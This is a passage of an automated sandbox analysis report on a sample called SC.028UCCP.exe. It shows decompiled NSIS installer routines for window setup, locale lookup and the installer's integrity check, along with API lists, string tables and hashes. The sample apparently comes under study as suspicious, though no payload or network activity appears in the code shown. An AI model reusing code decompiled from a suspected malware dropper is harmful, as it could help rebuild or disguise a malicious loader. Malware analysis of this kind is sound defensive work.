                                  							if( *_t130 == _t133) {
                                  								goto L61;
                                  							}
                                  							goto L34;
                                  						}
                                  						_push(0);
                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                  						__eflags = _t86;
                                  						if(_t86 == 0) {
                                  							goto L33;
                                  						}
                                  						SendMessageA( *0x42e378, 0x40f, 0, 1);
                                  						__eflags =  *0x42e36c - _t133; // 0x0
                                  						return 0 | __eflags == 0x00000000;
                                  					}
                                  				} else {
                                  					_t125 = _a4;
                                  					_t133 = 0;
                                  					if(_t115 == 0x47) {
                                  						SetWindowPos( *0x42a000, _t125, 0, 0, 0, 0, 0x13);
                                  					}
                                  					if(_t115 == 5) {
                                  						asm("sbb eax, eax");
                                  						ShowWindow( *0x42a000,  ~(_a12 - 1) & _t115);
                                  					}
                                  					if(_t115 != 0x40d) {
                                  						__eflags = _t115 - 0x11;
                                  						if(_t115 != 0x11) {
                                  							__eflags = _t115 - 0x111;
                                  							if(_t115 != 0x111) {
                                  								L26:
                                  								return E00403F0F(_t115, _a12, _a16);
                                  							}
                                  							_t132 = _a12 & 0x0000ffff;
                                  							_t126 = GetDlgItem(_t125, _t132);
                                  							__eflags = _t126 - _t133;
                                  							if(_t126 == _t133) {
                                  								L13:
                                  								__eflags = _t132 - 1;
                                  								if(_t132 != 1) {
                                  									__eflags = _t132 - 3;
                                  									if(_t132 != 3) {
                                  										_t127 = 2;
                                  										__eflags = _t132 - _t127;
                                  										if(_t132 != _t127) {
                                  											L25:
                                  											SendMessageA( *0x42e378, 0x111, _a12, _a16);
                                  											goto L26;
                                  										}
                                  										__eflags =  *0x42ec2c - _t133; // 0x0
                                  										if(__eflags == 0) {
                                  											_t99 = E0040140B(3);
                                  											__eflags = _t99;
                                  											if(_t99 != 0) {
                                  												goto L26;
                                  											}
                                  											 *0x4293f0 = 1;
                                  											L21:
                                  											_push(0x78);
                                  											L22:
                                  											E00403E81();
                                  											goto L26;
                                  										}
                                  										E0040140B(_t127);
                                  										 *0x4293f0 = _t127;
                                  										goto L21;
                                  									}
                                  									__eflags =  *0x4091d4 - _t133; // 0x0
                                  									if(__eflags <= 0) {
                                  										goto L25;
                                  									}
                                  									_push(0xffffffff);
                                  									goto L22;
                                  								}
                                  								_push(_t132);
                                  								goto L22;
                                  							}
                                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                                  							_t103 = IsWindowEnabled(_t126);
                                  							__eflags = _t103;
                                  							if(_t103 == 0) {
                                  								goto L61;
                                  							}
                                  							goto L13;
                                  						}
                                  						SetWindowLongA(_t125, _t133, _t133);
                                  						return 1;
                                  					} else {
                                  						DestroyWindow( *0x42e378);
                                  						 *0x42e378 = _a12;
                                  						L58:
                                  						_t141 =  *0x42b020 - _t133; // 0x0
                                  						if(_t141 == 0) {
                                  							_t142 =  *0x42e378 - _t133; // 0x0
                                  							if(_t142 != 0) {
                                  								ShowWindow(_t125, 0xa);
                                  								 *0x42b020 = 1;
                                  							}
                                  						}
                                  						L61:
                                  						return 0;
                                  					}
                                  				}
                                  			}

































                                  0x00403d85
                                  0x00403d87
                                  0x00000000
                                  0x00000000
                                  0x00403dad
                                  0x00403db3
                                  0x00403db5
                                  0x00403dba
                                  0x00000000
                                  0x00000000
                                  0x00403dc0
                                  0x00403dc3
                                  0x00403dc6
                                  0x00403ddd
                                  0x00403de9
                                  0x00403e02
                                  0x00403e08
                                  0x00403e0c
                                  0x00403e11
                                  0x00403e17
                                  0x00000000
                                  0x00000000
                                  0x00403e21
                                  0x00403e2c
                                  0x00000000
                                  0x00403e2c
                                  0x00403d56
                                  0x00403d5c
                                  0x00000000
                                  0x00000000
                                  0x00403d62
                                  0x00403d68
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403d6e
                                  0x00403d42
                                  0x00403e39
                                  0x00403e45
                                  0x00403e4c
                                  0x00000000
                                  0x00403b9d
                                  0x00403b9d
                                  0x00403ba0
                                  0x00403bd3
                                  0x00403bd3
                                  0x00403bd5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403bd5
                                  0x00403ba2
                                  0x00403ba6
                                  0x00403bab
                                  0x00403bad
                                  0x00000000
                                  0x00000000
                                  0x00403bbd
                                  0x00403bc5
                                  0x00000000
                                  0x00403bcb
                                  0x004039f9
                                  0x004039f9
                                  0x004039fd
                                  0x00403a02
                                  0x00403a11
                                  0x00403a11
                                  0x00403a1a
                                  0x00403a23
                                  0x00403a2e
                                  0x00403a2e
                                  0x00403a3a
                                  0x00403a56
                                  0x00403a59
                                  0x00403a6c
                                  0x00403a72
                                  0x00403b15
                                  0x00000000
                                  0x00403b1e
                                  0x00403a78
                                  0x00403a85
                                  0x00403a87
                                  0x00403a89
                                  0x00403aa8
                                  0x00403aa8
                                  0x00403aab
                                  0x00403ab0
                                  0x00403ab3
                                  0x00403ac3
                                  0x00403ac4
                                  0x00403ac6
                                  0x00403afc
                                  0x00403b0f
                                  0x00000000
                                  0x00403b0f
                                  0x00403ac8
                                  0x00403ace
                                  0x00403ae7
                                  0x00403aec
                                  0x00403aee
                                  0x00000000
                                  0x00000000
                                  0x00403af0
                                  0x00403adc
                                  0x00403adc
                                  0x00403ade
                                  0x00403ade
                                  0x00000000
                                  0x00403ade
                                  0x00403ad1
                                  0x00403ad6
                                  0x00000000
                                  0x00403ad6
                                  0x00403ab5
                                  0x00403abb
                                  0x00000000
                                  0x00000000
                                  0x00403abd
                                  0x00000000
                                  0x00403abd
                                  0x00403aad
                                  0x00000000
                                  0x00403aad
                                  0x00403a93
                                  0x00403a9a
                                  0x00403aa0
                                  0x00403aa2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403aa2
                                  0x00403a5e
                                  0x00000000
                                  0x00403a3c
                                  0x00403a42
                                  0x00403a4c
                                  0x00403e52
                                  0x00403e52
                                  0x00403e58
                                  0x00403e5a
                                  0x00403e60
                                  0x00403e65
                                  0x00403e6b
                                  0x00403e6b
                                  0x00403e60
                                  0x00403e75
                                  0x00000000
                                  0x00403e75
                                  0x00403a3a

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A11
                                  • ShowWindow.USER32(?), ref: 00403A2E
                                  • DestroyWindow.USER32 ref: 00403A42
                                  • SetWindowLongA.USER32 ref: 00403A5E
                                  • GetDlgItem.USER32 ref: 00403A7F
                                  • SendMessageA.USER32 ref: 00403A93
                                  • IsWindowEnabled.USER32(00000000), ref: 00403A9A
                                  • GetDlgItem.USER32 ref: 00403B48
                                  • GetDlgItem.USER32 ref: 00403B52
                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B6C
                                  • SendMessageA.USER32 ref: 00403BBD
                                  • GetDlgItem.USER32 ref: 00403C63
                                  • ShowWindow.USER32(00000000,?), ref: 00403C84
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C96
                                  • EnableWindow.USER32(?,?), ref: 00403CB1
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CC7
                                  • EnableMenuItem.USER32 ref: 00403CCE
                                  • SendMessageA.USER32 ref: 00403CE6
                                  • SendMessageA.USER32 ref: 00403CF9
                                  • lstrlenA.KERNEL32(0042A020,?,0042A020,Bilsynssteder Setup), ref: 00403D22
                                  • SetWindowTextA.USER32(?,0042A020), ref: 00403D31
                                  • ShowWindow.USER32(?,0000000A), ref: 00403E65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                  • String ID: Bilsynssteder Setup
                                  • API String ID: 3906175533-834225588
                                  • Opcode ID: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
                                  • Instruction ID: e8fab78920e23da8b75c4c4288663781101d80ffa248271b1c4be7e920c598d9
                                  • Opcode Fuzzy Hash: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
                                  • Instruction Fuzzy Hash: 5AC19131A04204BBDB21AF62ED45E2B3E6DFB45706F40053EF641B21E1C779A9429B5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 338 403643-40365b call 405ec3 341 40365d-403668 GetUserDefaultUILanguage call 405af6 338->341 342 40366f-4036a0 call 405a7f 338->342 345 40366d 341->345 348 4036a2-4036b3 call 405a7f 342->348 349 4036b8-4036be lstrcatA 342->349 347 4036c3-4036ec call 403908 call 405733 345->347 355 4036f2-4036f7 347->355 356 403773-40377b call 405733 347->356 348->349 349->347 355->356 357 4036f9-40371d call 405a7f 355->357 362 403789-4037ae LoadImageA 356->362 363 40377d-403784 call 405bba 356->363 357->356 364 40371f-403721 357->364 366 4037b0-4037e0 RegisterClassA 362->366 367 40382f-403837 call 40140b 362->367 363->362 368 403732-40373e lstrlenA 364->368 369 403723-403730 call 405670 364->369 370 4037e6-40382a SystemParametersInfoA CreateWindowExA 366->370 371 4038fe 366->371 378 403841-40384c call 403908 367->378 379 403839-40383c 367->379 375 403740-40374e lstrcmpiA 368->375 376 403766-40376e call 405645 call 405b98 368->376 369->368 370->367 373 403900-403907 371->373 375->376 382 403750-40375a GetFileAttributesA 375->382 376->356 390 403852-40386f ShowWindow LoadLibraryA 378->390 391 4038d5-4038dd call 404f77 378->391 379->373 385 403760-403761 call 40568c 382->385 386 40375c-40375e 382->386 385->376 386->376 386->385 392 403871-403876 LoadLibraryA 390->392 393 403878-40388a GetClassInfoA 390->393 398 4038f7-4038f9 call 40140b 391->398 399 4038df-4038e5 391->399 392->393 395 4038a2-4038c5 DialogBoxParamA call 40140b 393->395 396 40388c-40389c GetClassInfoA RegisterClassA 393->396 403 4038ca-4038d3 call 403593 395->403 396->395 398->371 399->379 401 4038eb-4038f2 call 40140b 399->401 401->379 403->373
                                  C-Code - Quality: 96%
                                  			E00403643() {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t17;
                                  				signed int _t21;
                                  				void* _t25;
                                  				void* _t27;
                                  				int _t28;
                                  				void* _t31;
                                  				struct HINSTANCE__* _t34;
                                  				int _t35;
                                  				intOrPtr _t36;
                                  				int _t39;
                                  				intOrPtr _t55;
                                  				char _t57;
                                  				CHAR* _t59;
                                  				signed char _t63;
                                  				signed short _t67;
                                  				struct HINSTANCE__* _t71;
                                  				CHAR* _t74;
                                  				intOrPtr _t76;
                                  				CHAR* _t82;
                                  
                                  				_t76 =  *0x42ebb0; // 0x5aa248
                                  				_t17 = E00405EC3(6);
                                  				_t84 = _t17;
                                  				if(_t17 == 0) {
                                  					_t74 = 0x42a020;
                                  					"1033" = 0x30;
                                  					 *0x435001 = 0x78;
                                  					 *0x435002 = 0;
                                  					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a020, 0);
                                  					__eflags =  *0x42a020;
                                  					if(__eflags == 0) {
                                  						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040730E, 0x42a020, 0);
                                  					}
                                  					lstrcatA("1033", _t74);
                                  				} else {
                                  					_t67 =  *_t17(); // executed
                                  					E00405AF6("1033", _t67 & 0x0000ffff);
                                  				}
                                  				E00403908(_t71, _t84);
                                  				_t21 =  *0x42ebb8; // 0x0
                                  				_t81 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter";
                                  				 *0x42ec20 = _t21 & 0x00000020;
                                  				 *0x42ec3c = 0x10000;
                                  				if(E00405733(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") != 0) {
                                  					L16:
                                  					if(E00405733(_t92, _t81) == 0) {
                                  						E00405BBA(0, _t74, _t76, _t81,  *((intOrPtr*)(_t76 + 0x118)));
                                  					}
                                  					_t25 = LoadImageA( *0x42eba0, 0x67, 1, 0, 0, 0x8040); // executed
                                  					 *0x42e388 = _t25;
                                  					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                  						L21:
                                  						if(E0040140B(0) == 0) {
                                  							_t27 = E00403908(_t71, __eflags);
                                  							__eflags =  *0x42ec40; // 0x0
                                  							if(__eflags != 0) {
                                  								_t28 = E00404F77(_t27, 0);
                                  								__eflags = _t28;
                                  								if(_t28 == 0) {
                                  									E0040140B(1);
                                  									goto L33;
                                  								}
                                  								__eflags =  *0x42e36c; // 0x0
                                  								if(__eflags == 0) {
                                  									E0040140B(2);
                                  								}
                                  								goto L22;
                                  							}
                                  							ShowWindow( *0x42a000, 5); // executed
                                  							_t34 = LoadLibraryA("RichEd20"); // executed
                                  							__eflags = _t34;
                                  							if(_t34 == 0) {
                                  								LoadLibraryA("RichEd32");
                                  							}
                                  							_t82 = "RichEdit20A";
                                  							_t35 = GetClassInfoA(0, _t82, 0x42e340);
                                  							__eflags = _t35;
                                  							if(_t35 == 0) {
                                  								GetClassInfoA(0, "RichEdit", 0x42e340);
                                  								 *0x42e364 = _t82;
                                  								RegisterClassA(0x42e340);
                                  							}
                                  							_t36 =  *0x42e380; // 0x0
                                  							_t39 = DialogBoxParamA( *0x42eba0, _t36 + 0x00000069 & 0x0000ffff, 0, E004039D5, 0); // executed
                                  							E00403593(E0040140B(5), 1);
                                  							return _t39;
                                  						}
                                  						L22:
                                  						_t31 = 2;
                                  						return _t31;
                                  					} else {
                                  						_t71 =  *0x42eba0; // 0x400000
                                  						 *0x42e344 = E00401000;
                                  						 *0x42e350 = _t71;
                                  						 *0x42e354 = _t25;
                                  						 *0x42e364 = 0x4091ec;
                                  						if(RegisterClassA(0x42e340) == 0) {
                                  							L33:
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                  						 *0x42a000 = CreateWindowExA(0x80, 0x4091ec, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eba0, 0);
                                  						goto L21;
                                  					}
                                  				} else {
                                  					_t71 =  *(_t76 + 0x48);
                                  					if(_t71 == 0) {
                                  						goto L16;
                                  					}
                                  					_t55 =  *0x42ebd8; // 0x5aba28
                                  					_t74 = 0x42db40;
                                  					E00405A7F( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) + _t55, 0x42db40, 0);
                                  					_t57 =  *0x42db40; // 0x43
                                  					if(_t57 == 0) {
                                  						goto L16;
                                  					}
                                  					if(_t57 == 0x22) {
                                  						_t74 = 0x42db41;
                                  						 *((char*)(E00405670(0x42db41, 0x22))) = 0;
                                  					}
                                  					_t59 = lstrlenA(_t74) + _t74 - 4;
                                  					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                  						L15:
                                  						E00405B98(_t81, E00405645(_t74));
                                  						goto L16;
                                  					} else {
                                  						_t63 = GetFileAttributesA(_t74);
                                  						if(_t63 == 0xffffffff) {
                                  							L14:
                                  							E0040568C(_t74);
                                  							goto L15;
                                  						}
                                  						_t92 = _t63 & 0x00000010;
                                  						if((_t63 & 0x00000010) != 0) {
                                  							goto L15;
                                  						}
                                  						goto L14;
                                  					}
                                  				}
                                  			}


                                  APIs
                                    • Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                    • Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                    • Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  • GetUserDefaultUILanguage.KERNELBASE(00000006,C:\Users\user\AppData\Local\Temp\,74D0FA90,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040365D
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  • lstrcatA.KERNEL32(1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74D0FA90,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 004036BE
                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter,1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403733
                                  • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter,1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000), ref: 00403746
                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403751
                                  • LoadImageA.USER32 ref: 0040379A
                                  • RegisterClassA.USER32 ref: 004037D7
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037EF
                                  • CreateWindowExA.USER32 ref: 00403824
                                  • ShowWindow.USER32(00000005,00000000), ref: 0040385A
                                  • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040386B
                                  • LoadLibraryA.KERNEL32(RichEd32), ref: 00403876
                                  • GetClassInfoA.USER32 ref: 00403886
                                  • GetClassInfoA.USER32 ref: 00403893
                                  • RegisterClassA.USER32 ref: 0040389C
                                  • DialogBoxParamA.USER32 ref: 004038BB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                  • API String ID: 2262724009-3499296158
                                  • Opcode ID: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
                                  • Instruction ID: d6b8b8f74f5c97fe18c953e6bf65f24cda553212ccbeeb7194f723ec3a9c37cf
                                  • Opcode Fuzzy Hash: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
                                  • Instruction Fuzzy Hash: EE61D570A442006EE720AF669C45F273EACE74475AF40457EF901B32E1C77DAD028A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 408 402c33-402c81 GetTickCount GetModuleFileNameA call 405846 411 402c83-402c88 408->411 412 402c8d-402cbb call 405b98 call 40568c call 405b98 GetFileSize 408->412 414 402e65-402e69 411->414 420 402cc1 412->420 421 402da8-402db6 call 402bcf 412->421 423 402cc6-402cdd 420->423 427 402db8-402dbb 421->427 428 402e0b-402e10 421->428 425 402ce1-402ce3 call 40308e 423->425 426 402cdf 423->426 432 402ce8-402cea 425->432 426->425 430 402dbd-402dce call 4030c0 call 40308e 427->430 431 402ddf-402e09 GlobalAlloc call 4030c0 call 402e6c 427->431 428->414 449 402dd3-402dd5 430->449 431->428 455 402e1c-402e2d 431->455 434 402cf0-402cf7 432->434 435 402e12-402e1a call 402bcf 432->435 439 402d73-402d77 434->439 440 402cf9-402d0d call 405801 434->440 435->428 445 402d81-402d87 439->445 446 402d79-402d80 call 402bcf 439->446 440->445 454 402d0f-402d16 440->454 451 402d96-402da0 445->451 452 402d89-402d93 call 405f35 445->452 446->445 449->428 457 402dd7-402ddd 449->457 451->423 456 402da6 451->456 452->451 454->445 461 402d18-402d1f 454->461 462 402e35-402e3a 455->462 463 402e2f 455->463 456->421 457->428 457->431 461->445 464 402d21-402d28 461->464 465 402e3b-402e41 462->465 463->462 464->445 466 402d2a-402d31 464->466 465->465 467 402e43-402e5e SetFilePointer call 405801 465->467 466->445 468 402d33-402d53 466->468 471 402e63 467->471 468->428 470 402d59-402d5d 468->470 472 402d65-402d6d 470->472 473 402d5f-402d63 470->473 471->414 472->445 474 402d6f-402d71 472->474 473->456 473->472 474->445
                                  C-Code - Quality: 80%
                                  			E00402C33(void* __eflags, signed int _a4) {
                                  				DWORD* _v8;
                                  				DWORD* _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				long _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				signed int _v44;
                                  				long _t43;
                                  				signed int _t50;
                                  				void* _t53;
                                  				signed int _t54;
                                  				void* _t57;
                                  				intOrPtr* _t59;
                                  				long _t60;
                                  				signed int _t65;
                                  				signed int _t67;
                                  				signed int _t70;
                                  				signed int _t71;
                                  				signed int _t77;
                                  				intOrPtr _t80;
                                  				long _t82;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				void* _t89;
                                  				signed int _t90;
                                  				signed int _t93;
                                  				void* _t94;
                                  
                                  				_t82 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_t43 = GetTickCount();
                                  				_t91 = "C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe";
                                  				 *0x42ebac = _t43 + 0x3e8;
                                  				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe", 0x400);
                                  				_t89 = E00405846(_t91, 0x80000000, 3);
                                  				_v16 = _t89;
                                  				 *0x409018 = _t89;
                                  				if(_t89 == 0xffffffff) {
                                  					return "Error launching installer";
                                  				}
                                  				_t92 = "C:\\Users\\hardz\\Desktop";
                                  				E00405B98("C:\\Users\\hardz\\Desktop", _t91);
                                  				E00405B98(0x436000, E0040568C(_t92));
                                  				_t50 = GetFileSize(_t89, 0);
                                  				__eflags = _t50;
                                  				 *0x428bd8 = _t50;
                                  				_t93 = _t50;
                                  				if(_t50 <= 0) {
                                  					L24:
                                  					E00402BCF(1);
                                  					__eflags =  *0x42ebb4 - _t82; // 0x8c00
                                  					if(__eflags == 0) {
                                  						goto L29;
                                  					}
                                  					__eflags = _v8 - _t82;
                                  					if(_v8 == _t82) {
                                  						L28:
                                  						_t53 = GlobalAlloc(0x40, _v24); // executed
                                  						_t94 = _t53;
                                  						_t54 =  *0x42ebb4; // 0x8c00
                                  						E004030C0(_t54 + 0x1c);
                                  						_push(_v24);
                                  						_push(_t94);
                                  						_push(_t82);
                                  						_push(0xffffffff);
                                  						_t57 = E00402E6C();
                                  						__eflags = _t57 - _v24;
                                  						if(_t57 == _v24) {
                                  							__eflags = _v44 & 0x00000001;
                                  							 *0x42ebb0 = _t94;
                                  							 *0x42ebb8 =  *_t94;
                                  							if((_v44 & 0x00000001) != 0) {
                                  								 *0x42ebbc =  *0x42ebbc + 1;
                                  								__eflags =  *0x42ebbc;
                                  							}
                                  							_t40 = _t94 + 0x44; // 0x44
                                  							_t59 = _t40;
                                  							_t85 = 8;
                                  							do {
                                  								_t59 = _t59 - 8;
                                  								 *_t59 =  *_t59 + _t94;
                                  								_t85 = _t85 - 1;
                                  								__eflags = _t85;
                                  							} while (_t85 != 0);
                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                  							 *(_t94 + 0x3c) = _t60;
                                  							E00405801(0x42ebc0, _t94 + 4, 0x40);
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						goto L29;
                                  					}
                                  					E004030C0( *0x414bc8);
                                  					_t65 = E0040308E( &_a4, 4); // executed
                                  					__eflags = _t65;
                                  					if(_t65 == 0) {
                                  						goto L29;
                                  					}
                                  					__eflags = _v12 - _a4;
                                  					if(_v12 != _a4) {
                                  						goto L29;
                                  					}
                                  					goto L28;
                                  				} else {
                                  					do {
                                  						_t67 =  *0x42ebb4; // 0x8c00
                                  						_t90 = _t93;
                                  						asm("sbb eax, eax");
                                  						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                  						__eflags = _t93 - _t70;
                                  						if(_t93 >= _t70) {
                                  							_t90 = _t70;
                                  						}
                                  						_t71 = E0040308E(0x420bd8, _t90); // executed
                                  						__eflags = _t71;
                                  						if(_t71 == 0) {
                                  							E00402BCF(1);
                                  							L29:
                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                  						}
                                  						__eflags =  *0x42ebb4;
                                  						if( *0x42ebb4 != 0) {
                                  							__eflags = _a4 & 0x00000002;
                                  							if((_a4 & 0x00000002) == 0) {
                                  								E00402BCF(0);
                                  							}
                                  							goto L20;
                                  						}
                                  						E00405801( &_v44, 0x420bd8, 0x1c);
                                  						_t77 = _v44;
                                  						__eflags = _t77 & 0xfffffff0;
                                  						if((_t77 & 0xfffffff0) != 0) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v40 - 0xdeadbeef;
                                  						if(_v40 != 0xdeadbeef) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v28 - 0x74736e49;
                                  						if(_v28 != 0x74736e49) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v32 - 0x74666f73;
                                  						if(_v32 != 0x74666f73) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v36 - 0x6c6c754e;
                                  						if(_v36 != 0x6c6c754e) {
                                  							goto L20;
                                  						}
                                  						_a4 = _a4 | _t77;
                                  						_t87 =  *0x414bc8; // 0x3fc1c
                                  						 *0x42ec40 =  *0x42ec40 | _a4 & 0x00000002;
                                  						_t80 = _v20;
                                  						__eflags = _t80 - _t93;
                                  						 *0x42ebb4 = _t87;
                                  						if(_t80 > _t93) {
                                  							goto L29;
                                  						}
                                  						__eflags = _a4 & 0x00000008;
                                  						if((_a4 & 0x00000008) != 0) {
                                  							L16:
                                  							_v8 = _v8 + 1;
                                  							_t24 = _t80 - 4; // 0x40918c
                                  							_t93 = _t24;
                                  							__eflags = _t90 - _t93;
                                  							if(_t90 > _t93) {
                                  								_t90 = _t93;
                                  							}
                                  							goto L20;
                                  						}
                                  						__eflags = _a4 & 0x00000004;
                                  						if((_a4 & 0x00000004) != 0) {
                                  							break;
                                  						}
                                  						goto L16;
                                  						L20:
                                  						__eflags = _t93 -  *0x428bd8; // 0x41480
                                  						if(__eflags < 0) {
                                  							_v12 = E00405F35(_v12, 0x420bd8, _t90);
                                  						}
                                  						 *0x414bc8 =  *0x414bc8 + _t90;
                                  						_t93 = _t93 - _t90;
                                  						__eflags = _t93;
                                  					} while (_t93 > 0);
                                  					_t82 = 0;
                                  					__eflags = 0;
                                  					goto L24;
                                  				}
                                  			}

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402C44
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SC.028UCCP.exe,00000400), ref: 00402C60
                                    • Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                    • Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00402CAC
                                  Strings
                                  • soft, xrefs: 00402D21
                                  • Inst, xrefs: 00402D18
                                  • C:\Users\user\Desktop\SC.028UCCP.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                  • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                  • Null, xrefs: 00402D2A
